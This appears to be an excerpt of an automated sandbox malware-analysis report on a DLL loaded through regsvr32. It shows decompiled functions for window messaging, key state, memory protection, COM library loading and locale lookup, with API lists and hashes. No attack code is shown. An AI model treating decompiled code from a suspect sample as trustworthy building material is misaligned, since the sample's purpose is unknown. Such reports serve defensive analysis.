							if( *((intOrPtr*)( *_v20 + 0x100))() != 0) {
								goto L37;
							}
							_t68 = E10022A96(_t115);
							_v20 = _t68;
							if(_t68 != 0) {
								continue;
							}
							goto L35;
						}
						goto L37;
					} else {
						L38:
						__eflags = 0;
						return 0;
					}
				}
			}

























                                                                                                            0x1002fe23
                                                                                                            0x1002fe27
                                                                                                            0x1002fe30
                                                                                                            0x1003000b
                                                                                                            0x00000000
                                                                                                            0x1003000d
                                                                                                            0x1002fe36
                                                                                                            0x1002fe45
                                                                                                            0x1002fe4d
                                                                                                            0x1002fe65
                                                                                                            0x1002fe75
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002fe87
                                                                                                            0x1002fe87
                                                                                                            0x1002fe8c
                                                                                                            0x1002fe8f
                                                                                                            0x1002fe98
                                                                                                            0x1002fea2
                                                                                                            0x1002fea5
                                                                                                            0x1002feb3
                                                                                                            0x1002fec9
                                                                                                            0x1002fed0
                                                                                                            0x1002fed3
                                                                                                            0x1002fed7
                                                                                                            0x1002feda
                                                                                                            0x1002fedc
                                                                                                            0x1002fedf
                                                                                                            0x1002fee4
                                                                                                            0x1002fee7
                                                                                                            0x1002fef8
                                                                                                            0x1002fefc
                                                                                                            0x1002fefe
                                                                                                            0x1002ff02
                                                                                                            0x1002ff08
                                                                                                            0x1002ff0b
                                                                                                            0x1002ff13
                                                                                                            0x1002ff13
                                                                                                            0x1002ff0b
                                                                                                            0x1002feef
                                                                                                            0x1002feef
                                                                                                            0x1002feef
                                                                                                            0x1002ff1a
                                                                                                            0x1002ff84
                                                                                                            0x1002ff8a
                                                                                                            0x1002ff8d
                                                                                                            0x1002ff95
                                                                                                            0x1002ff9b
                                                                                                            0x1002ffa9
                                                                                                            0x00000000
                                                                                                            0x1002ffa9
                                                                                                            0x1002ff8f
                                                                                                            0x1002ff93
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ff22
                                                                                                            0x1002ff28
                                                                                                            0x1002ff42
                                                                                                            0x1002ff46
                                                                                                            0x1002ff73
                                                                                                            0x1002ff7a
                                                                                                            0x1002ffaf
                                                                                                            0x1002ffb5
                                                                                                            0x00000000
                                                                                                            0x1002ffb5
                                                                                                            0x1002ff4a
                                                                                                            0x1002ff50
                                                                                                            0x1002ff53
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ff58
                                                                                                            0x1002ff5b
                                                                                                            0x1002ff5e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ff60
                                                                                                            0x1002ff65
                                                                                                            0x1002ff6a
                                                                                                            0x1002ff6c
                                                                                                            0x00000000
                                                                                                            0x1002ff6c
                                                                                                            0x1002ff30
                                                                                                            0x1002ff36
                                                                                                            0x1002ff3b
                                                                                                            0x00000000
                                                                                                            0x1002ff3b
                                                                                                            0x1002ff1a
                                                                                                            0x1002ffb8
                                                                                                            0x1002ffb8
                                                                                                            0x1002ffba
                                                                                                            0x1002ffc2
                                                                                                            0x1002ffce
                                                                                                            0x1002fff2
                                                                                                            0x1002fffd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ffd0
                                                                                                            0x1002ffd0
                                                                                                            0x1002ffd0
                                                                                                            0x1002ffd3
                                                                                                            0x1002ffe2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ffe6
                                                                                                            0x1002ffed
                                                                                                            0x1002fff0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002fff0
                                                                                                            0x00000000
                                                                                                            0x10030010
                                                                                                            0x10030010
                                                                                                            0x10030010
                                                                                                            0x00000000
                                                                                                            0x10030010
                                                                                                            0x1002ffc2

                                                                                                            APIs
                                                                                                              • Part of subcall function 10008325: GetParent.USER32(?), ref: 1000832F
                                                                                                            • ScreenToClient.USER32 ref: 1002FEA5
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002FF02
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002FF4A
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002FF84
                                                                                                            • KillTimer.USER32(?,0000E001), ref: 1002FFA9
                                                                                                            • IsWindow.USER32(?), ref: 1002FFF5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: State$ClientKillParentScreenTimerWindow
                                                                                                            • String ID: (
                                                                                                            • API String ID: 1540673551-3887548279
                                                                                                            • Opcode ID: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                                                            • Instruction ID: 52046703db0e3be90f8dc11269cbd7e61114aefd04d05f62ac3939d045805729
                                                                                                            • Opcode Fuzzy Hash: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                                                            • Instruction Fuzzy Hash: E4519E35A00249DFDB51DFA4D988BADBBF1EF48390F51007DE915AB2E2D7709A81CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10032A2D Relevance: 10.6, APIs: 7, Instructions: 67windowkeyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E10032A2D(void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t24;
				void* _t29;
				int _t32;
				struct HWND__* _t36;

				_push(__ecx);
				_t29 = __ecx;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t36 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t36 != 0) {
					_t32 = _a4 << 0x10;
					do {
						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
						_t36 = GetParent(_t36);
					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
				} else {
					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t24;
			}








                                                                                                            0x10032a30
                                                                                                            0x10032a3c
                                                                                                            0x10032a43
                                                                                                            0x10032a45
                                                                                                            0x10032a47
                                                                                                            0x10032a47
                                                                                                            0x10032a53
                                                                                                            0x10032a55
                                                                                                            0x10032a57
                                                                                                            0x10032a57
                                                                                                            0x10032a64
                                                                                                            0x10032a6e
                                                                                                            0x10032a71
                                                                                                            0x10032a9d
                                                                                                            0x10032a9f
                                                                                                            0x10032ab0
                                                                                                            0x10032aba
                                                                                                            0x10032aba
                                                                                                            0x10032a73
                                                                                                            0x10032a90
                                                                                                            0x10032a90
                                                                                                            0x10032acd

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendState$DesktopFocusParentWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 4150626516-0
                                                                                                            • Opcode ID: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                                                            • Instruction ID: b978b154d262d257bd1bf3691abd3912275a9b299a299c021808da74b3d9ae9a
                                                                                                            • Opcode Fuzzy Hash: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                                                            • Instruction Fuzzy Hash: BD11CA32A00B39BFE7629BA68C84E593B98EB44792F114425FE41DF141D6B0EC41D7B1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010839 Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E10010839(void* __ecx, void* __eflags) {
				void* _v8;
				long _v12;
				long _v16;
				signed char _v23;
				struct _MEMORY_BASIC_INFORMATION _v44;
				struct _SYSTEM_INFO _v80;
				void* _v92;
				void* _t29;
				int _t33;
				intOrPtr _t35;
				void* _t43;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;
				void* _t62;
				void* _t63;

				_t29 = 4;
				E10010B20(_t29, __ecx);
				_t55 = _t63;
				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
					L9:
					_t33 = 0;
				} else {
					_t46 = _v44.AllocationBase;
					GetSystemInfo( &_v80);
					_t49 = _v80.dwPageSize;
					_t35 =  *0x1004f3e0; // 0x2
					_t54 = ( !(_t49 - 1) & _t55) - _t49;
					asm("sbb esi, esi");
					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
					_v12 = _t49;
					if(_t54 < _t62) {
						goto L9;
					} else {
						if(_t35 == 1) {
							_v8 = _t54;
							goto L14;
						} else {
							_v8 = _t46;
							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
								_v8 = _v8 + _v44.RegionSize;
								if((_v44.State & 0x00001000) == 0) {
									continue;
								} else {
									_t43 = _v44.BaseAddress;
									_v8 = _t43;
									if((_v23 & 0x00000001) == 0) {
										if(_t54 >= _t43) {
											if(_t43 < _t62) {
												_v8 = _t62;
											}
											VirtualAlloc(_v8, _v12, 0x1000, 4);
											_t35 =  *0x1004f3e0; // 0x2
											L14:
											asm("sbb eax, eax");
											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
										} else {
											goto L9;
										}
									} else {
										_t33 = 1;
									}
								}
								goto L15;
							}
							goto L9;
						}
					}
				}
				L15:
				return _t33;
			}




















                                                                                                            0x10010844
                                                                                                            0x10010845
                                                                                                            0x1001084a
                                                                                                            0x1001085b
                                                                                                            0x100108d4
                                                                                                            0x100108d4
                                                                                                            0x1001085d
                                                                                                            0x1001085d
                                                                                                            0x10010864
                                                                                                            0x1001086a
                                                                                                            0x1001086d
                                                                                                            0x10010879
                                                                                                            0x10010880
                                                                                                            0x1001088b
                                                                                                            0x1001088f
                                                                                                            0x10010892
                                                                                                            0x00000000
                                                                                                            0x10010894
                                                                                                            0x10010897
                                                                                                            0x100108f5
                                                                                                            0x00000000
                                                                                                            0x10010899
                                                                                                            0x10010899
                                                                                                            0x100108a1
                                                                                                            0x100108b7
                                                                                                            0x100108bd
                                                                                                            0x00000000
                                                                                                            0x100108bf
                                                                                                            0x100108c3
                                                                                                            0x100108c6
                                                                                                            0x100108c9
                                                                                                            0x100108d2
                                                                                                            0x100108da
                                                                                                            0x100108dc
                                                                                                            0x100108dc
                                                                                                            0x100108e8
                                                                                                            0x100108ee
                                                                                                            0x100108f8
                                                                                                            0x100108fb
                                                                                                            0x1001090e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100108cb
                                                                                                            0x100108cd
                                                                                                            0x100108cd
                                                                                                            0x100108c9
                                                                                                            0x00000000
                                                                                                            0x100108bd
                                                                                                            0x00000000
                                                                                                            0x100108a1
                                                                                                            0x10010897
                                                                                                            0x10010892
                                                                                                            0x10010914
                                                                                                            0x1001091b

                                                                                                            APIs
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 10010853
                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10010864
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 100108AA
                                                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 100108E8
                                                                                                            • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 1001090E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 4136887677-0
                                                                                                            • Opcode ID: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                                                            • Instruction ID: ea62dba494344a01c7efc91e140871f3e8746f8623a2ca282db0dc9e1cf87e08
                                                                                                            • Opcode Fuzzy Hash: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                                                            • Instruction Fuzzy Hash: 60316D32E0425DEBEF10CBA8CD85AED7BB8EB05355F110165F981EB191DBB09A809B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10025CEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E10025CEC(void* __ecx, void* __eflags) {
				intOrPtr* _t21;
				void* _t25;
				struct HINSTANCE__* _t26;
				_Unknown_base(*)()* _t30;
				void* _t39;
				CHAR* _t40;
				void* _t42;
				signed int* _t43;
				void* _t44;
				void* _t46;

				E10011BF0(0x1003acec, _t46);
				_t43 =  *(_t46 + 0x10);
				 *_t43 =  *_t43 & 0x00000000;
				E10025C6A(_t46 - 0x10,  *((intOrPtr*)(_t46 + 8)));
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				_t21 = E100243B2();
				_t38 =  *_t21;
				 *(_t46 + 0x10) =  *((intOrPtr*)( *_t21 + 0xc))(_t39, _t42, __ecx) + 0x10;
				 *(_t46 - 4) = 1;
				_t25 = E1002583A( *((intOrPtr*)(_t46 - 0x10)), _t46 + 0x10);
				_t40 =  *(_t46 + 0x10);
				if(_t25 != 0) {
					_t26 = LoadLibraryA(_t40);
					if(_t26 == 0) {
						goto L1;
					}
					_t30 = GetProcAddress(_t26, "DllGetClassObject");
					if(_t30 == 0) {
						_t44 = 0x800401f9;
					} else {
						_t44 =  *_t30( *((intOrPtr*)(_t46 + 8)),  *((intOrPtr*)(_t46 + 0xc)), _t43);
					}
					L6:
					E100014B0(_t40 - 0x10, _t38);
					E100014B0( *((intOrPtr*)(_t46 - 0x10)) + 0xfffffff0, _t38);
					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
					return _t44;
				}
				L1:
				_t44 = 0x80040154;
				goto L6;
			}













                                                                                                            0x10025cf1
                                                                                                            0x10025cf8
                                                                                                            0x10025cfb
                                                                                                            0x10025d06
                                                                                                            0x10025d0b
                                                                                                            0x10025d0f
                                                                                                            0x10025d14
                                                                                                            0x10025d1e
                                                                                                            0x10025d28
                                                                                                            0x10025d2c
                                                                                                            0x10025d33
                                                                                                            0x10025d36
                                                                                                            0x10025d40
                                                                                                            0x10025d48
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10025d50
                                                                                                            0x10025d58
                                                                                                            0x10025d67
                                                                                                            0x10025d5a
                                                                                                            0x10025d63
                                                                                                            0x10025d63
                                                                                                            0x10025d6c
                                                                                                            0x10025d6f
                                                                                                            0x10025d7a
                                                                                                            0x10025d86
                                                                                                            0x10025d8e
                                                                                                            0x10025d8e
                                                                                                            0x10025d38
                                                                                                            0x10025d38
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10025CF1
                                                                                                              • Part of subcall function 10025C6A: wsprintfA.USER32 ref: 10025CC5
                                                                                                              • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                                                              • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                                                              • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                                                              • Part of subcall function 1002583A: RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                                                              • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                                                              • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                                                              • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,10025DBC,?,100430A8,00000000), ref: 10025D40
                                                                                                            • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 10025D50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
                                                                                                            • String ID: DllGetClassObject
                                                                                                            • API String ID: 821125782-1075368562
                                                                                                            • Opcode ID: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                                                            • Instruction ID: 4c2bc5ab8f47dce9d6dfca02a5288212b81b2082d3bc100dcb553b8fe7e2210e
                                                                                                            • Opcode Fuzzy Hash: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                                                            • Instruction Fuzzy Hash: CB11BC3260021AAFDB11DFA4DC08BAF77B8FF00356F044969F812E7261DB34E9018BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100348C4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43librarystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E100348C4(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				char _v284;
				intOrPtr _t10;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;

				_t22 = __esi;
				_t20 = __ecx;
				_t19 = __ebx;
				_t27 = _a8 - 0x800;
				_t10 =  *0x1004c470; // 0xf3933a06
				_v8 = _t10;
				if(_a8 != 0x800) {
					__eflags = GetLocaleInfoA(_a8, 3,  &_a8, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					lstrcpyA( &_a8, "LOC");
					L2:
					_push(_t22);
					_t15 = E10011D44(_t19, _t20, _t27,  &_v284, 0x112, _a4,  &_a8);
					if(_t15 == 0xffffffff || _t15 >= 0x112) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
				}
				return E100117AE(_t12, _v8);
			}










                                                                                                            0x100348c4
                                                                                                            0x100348c4
                                                                                                            0x100348c4
                                                                                                            0x100348cd
                                                                                                            0x100348d4
                                                                                                            0x100348d9
                                                                                                            0x100348df
                                                                                                            0x10034930
                                                                                                            0x10034932
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034934
                                                                                                            0x100348e1
                                                                                                            0x100348e7
                                                                                                            0x100348ed
                                                                                                            0x100348ed
                                                                                                            0x10034902
                                                                                                            0x1003490d
                                                                                                            0x10034936
                                                                                                            0x10034936
                                                                                                            0x10034913
                                                                                                            0x1003491a
                                                                                                            0x1003491a
                                                                                                            0x10034938
                                                                                                            0x10034942

                                                                                                            APIs
                                                                                                            • lstrcpyA.KERNEL32(00000800,LOC), ref: 100348E7
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 1003491A
                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 1003492A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLibraryLoadLocalelstrcpy
                                                                                                            • String ID: LOC
                                                                                                            • API String ID: 864663389-519433814
                                                                                                            • Opcode ID: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                                                            • Instruction ID: 1b661f8c901bfcf78996fae171bebb1d1a637ee772a53719b66f99f2a01cec23
                                                                                                            • Opcode Fuzzy Hash: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                                                            • Instruction Fuzzy Hash: 6C018B3990111CAFEB62DFA0DC49EDE37ACEB00326F018562FA15DE190DB30EA448B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10007AE5 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E10007AE5(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E1000799F() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E10007A99( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x1004edfc(_a4, _a8);
			}





                                                                                                            0x10007af2
                                                                                                            0x10007b06
                                                                                                            0x10007b1a
                                                                                                            0x10007b32
                                                                                                            0x10007b1c
                                                                                                            0x10007b23
                                                                                                            0x10007b23
                                                                                                            0x10007b3a
                                                                                                            0x00000000
                                                                                                            0x10007b3c
                                                                                                            0x00000000
                                                                                                            0x10007b43
                                                                                                            0x10007b3a
                                                                                                            0x00000000
                                                                                                            0x10007b08
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 83ae4de29b23ff51b0e8bec05b4b5c9f8fcd8e6cb892886513852504e8bddb0b
                                                                                                            • Instruction ID: 3a21d875c7eeece48a0e685930edcd66bc13eb96913376d54ee1399e2fea6754
                                                                                                            • Opcode Fuzzy Hash: 83ae4de29b23ff51b0e8bec05b4b5c9f8fcd8e6cb892886513852504e8bddb0b
                                                                                                            • Instruction Fuzzy Hash: DFF0C935A04119ABEB02EF61CC49EAE7FA9FB042C4B408025FD1AD506ADB38DA559B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001090 Relevance: 4.5, APIs: 3, Instructions: 34threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10001090() {
				char _v8;
				char _t12;
				intOrPtr* _t16;
				signed int _t18;

				_t18 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v8, 7) == 0) {
					L5:
					return GetACP();
				} else {
					_t12 = _v8;
					_t16 =  &_v8;
					if(_t12 == 0) {
						goto L5;
					} else {
						do {
							_t16 = _t16 + 1;
							_t18 = _t12 + (_t18 + _t18 * 4) * 2 - 0x30;
							_t12 =  *_t16;
						} while (_t12 != 0);
						if(_t18 != 0) {
							return _t18;
						} else {
							goto L5;
						}
					}
				}
			}







                                                                                                            0x10001094
                                                                                                            0x100010b1
                                                                                                            0x100010d5
                                                                                                            0x100010df
                                                                                                            0x100010b3
                                                                                                            0x100010b3
                                                                                                            0x100010b9
                                                                                                            0x100010bd
                                                                                                            0x00000000
                                                                                                            0x100010c0
                                                                                                            0x100010c0
                                                                                                            0x100010c6
                                                                                                            0x100010c7
                                                                                                            0x100010cb
                                                                                                            0x100010cd
                                                                                                            0x100010d3
                                                                                                            0x100010e6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100010d3
                                                                                                            0x100010bd

                                                                                                            APIs
                                                                                                            • GetThreadLocale.KERNEL32 ref: 10001096
                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00001004,00000007,00000007), ref: 100010A9
                                                                                                            • GetACP.KERNEL32 ref: 100010D5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Locale$InfoThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 4232894706-0
                                                                                                            • Opcode ID: e87460b6ede7ecce593e36227f27ce69e25290a2edb96822d484cbb01d0533fa
                                                                                                            • Instruction ID: 26a1fdc9c2cb66cfcd8947c1f0583feeb1697c74baf4304ef7dc7fad7aa6cfc5
                                                                                                            • Opcode Fuzzy Hash: e87460b6ede7ecce593e36227f27ce69e25290a2edb96822d484cbb01d0533fa
                                                                                                            • Instruction Fuzzy Hash: 3BF0E2366002B09AEE02DF61EC44ADB3BA4EF04BC1F814548EDC59B105E660AA0AC7E2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

